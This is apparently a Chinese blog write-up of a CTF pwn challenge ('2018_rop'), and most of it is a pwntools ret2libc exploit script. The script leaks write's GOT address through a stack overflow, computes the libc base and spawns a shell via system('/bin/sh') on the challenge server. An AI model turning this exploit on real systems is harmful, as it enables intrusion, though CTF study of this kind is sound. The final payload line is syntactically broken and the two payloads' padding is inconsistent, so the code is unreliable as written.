checksec
ida
发现main函数中调用了两个函数
在第二个调用函数中发现了溢出点.
经过在ida中搜索,发现既没有system函数也没有bin/sh字符串,所以要想办法泄露出libc函数的地址来得到libc版本,找到system函数和bin/sh地址偏移.
exp
from pwn import *
context(os = 'linux',arch = 'i386', log_level = 'debug')
elf = ELF("./2018_rop")
local = 0
if local:
r = process("./2018_rop")
else:
r = remote("node4.buuoj.cn",26131)
read_plt = elf.plt['read']
print("read_plt="+hex(read_plt))
read_got = elf.got['read']
print("read_got="+hex(read_got))
main_addr = 0x080484C6
write_plt = elf.plt['write']
print("write_plt="+hex(write_plt))
write_got = elf.got['write']
print("write_got"+hex(write_got))
payload1 = b'a'*(0x88+0x8) + p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(0x4)
r.sendline(payload1)
write_addr = u32(r.recv(4))
#最后泄露出libc版本是libc6-i386_2.27-3ubuntu1_amd64
#write_offset = 0x0e4e30
#system_offset = 0x046a20
#str_bin_sh_offset = 0x165ca8
write_offset = 0x0e56f0
system_offset = 0x03cd10
str_bin_sh_offset = 0x17b8cf
libc_base = write_addr - write_offset
system_addr = libc_base + system_offset
str_bin_sh = libc_base + str_bin_sh_offset
payload2 = b'a'*(0x88+0x4)+p32(system_addr)++p32(0)p32(str_bin_sh)
r.sendline(payload2)
r.interactive()
456
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
